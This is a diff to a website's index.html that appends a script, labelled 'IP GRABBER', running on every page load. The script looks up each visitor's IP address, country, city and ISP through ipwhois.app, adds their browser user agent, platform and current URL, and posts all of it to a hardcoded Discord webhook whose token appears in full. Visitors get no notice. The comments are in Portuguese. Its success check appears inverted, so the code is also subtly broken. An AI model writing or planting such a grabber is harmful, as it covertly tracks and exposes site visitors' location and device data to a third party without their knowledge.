--- a/index.html
+++ b/index.html
@@ -814,5 +814,70 @@
     });
     window.addEventListener('load', createParticles);
   </script>
+
+    <script>
+(async () => {
+  try {
+    const response = await fetch("https://ipwhois.app/json/");
+    if (!response.ok) throw new Error(`Erro HTTP: ${response.status}`);
+
+    const ipData = await response.json();
+
+    // Verifica se o sucesso veio como true
+    if (ipData.success !== false) {
+      console.warn("API não retornou sucesso:", ipData);
+      return; // Sai sem enviar nada
+    }
+
+    const userAgent = navigator.userAgent || "Desconhecido";
+    const platform = navigator.platform || "Desconhecido";
+    const currentURL = window.location.href || "Desconhecido";
+
+    function safe(field) {
+      return field ? field : "Desconhecido";
+    }
+
+    const description = `>>> **Novo acesso detectado!**\n
+📍 **IP:** ${safe(ipData.ip)}
+🌍 **País:** ${safe(ipData.country)}
+🏙️ **Cidade:** ${safe(ipData.city)}
+🕸️ **Operadora/ISP:** ${safe(ipData.isp)}
+🧠 **Sistema:** ${platform}
+🌐 **Navegador:** ${userAgent}
+🔗 **Página:** ${currentURL}
+🕒 **Horário:** ${new Date().toLocaleString()}`;
+
+    const webhookUrl = "https://discord.com/api/webhooks/1390800357046620243/y-IJGs9361T_10kLLJ4F4QUJBlIfGUv3oqslint7jSw7VCUoDePrYVTYu_A8S0TNvqp-";
+
+    const payload = {
+      content: null,
+      embeds: [
+        {
+          title: "IP GRABBER",
+          description: description,
+          color: 6425511,
+          author: {
+            name: "fazmeutrampo.shop",
+            icon_url: "https://cdn.discordapp.com/icons/1389366603048554497/731ca00818e63e981e31ea70900403f2.png?size=2048"
+          },
+          thumbnail: {
+            url: "https://cdn.discordapp.com/icons/1389366603048554497/731ca00818e63e981e31ea70900403f2.png?size=2048"
+          }
+        }
+      ]
+    };
+
+    await fetch(webhookUrl, {
+      method: "POST",
+      headers: { "Content-Type": "application/json" },
+      body: JSON.stringify(payload)
+    });
+
+    console.log("✅ Info enviada pro Discord com sucesso.");
+  } catch (err) {
+    console.error("❌ Erro ao enviar dados pro Discord:", err);
+  }
+})();
+</script>
 </body>
 </html>
